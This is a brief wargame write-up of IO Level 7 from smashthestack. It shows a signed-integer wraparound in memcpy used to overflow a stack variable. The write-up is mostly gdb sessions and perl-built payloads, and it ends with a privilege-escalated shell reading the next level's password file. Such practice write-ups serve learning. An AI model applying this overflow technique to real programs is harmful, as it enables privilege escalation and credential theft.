IO Level 7

Level 7 from io.smashthestack.org:

count is a signed integer, so a negative integer can be passed in. If a very large negative integer is passed in, the math problem in the memcpy() will cause the int to wrap around, back to positive territory. Here are some debugging printfs to help visualize how many bytes are actually being copied in the memcpy():


level7@io:/tmp/ds7$ ./level07 -1073741815 blah
count: -1073741815 (0xc0000009) 3221225481
count * sizeof(int): 36 (0x00000024) 36
Not today son

Bruteforce offsets a bit to get things to line up:

(gdb) run -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /tmp/ds7/level07 -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`

count: -1073741813 (0xc000000b) 3221225483

count * sizeof(int): 44 (0x0000002c) 44

Breakpoint 1, main (argc=3, argv=0xbffffd64) at level07.c:23

23              if(count == 0x574f4c46) {

(gdb) x/x &count

0xbffffcac:     0x42424242

Adjust offsets for production:

(gdb) run -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

Breakpoint 1, 0x08048467 in main ()

(gdb) x/x $ebp - 0xc

0xbffffc9c:     0x574f4c46

level7@io:/tmp/ds7$ /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

WIN!

sh-4.2$ id

uid=1007(level7) gid=1007(level7) euid=1008(level8) groups=1008(level8),1007(level7),1029(nosu)

sh-4.2$ cat /home/level8/.pass

shhh don't snitch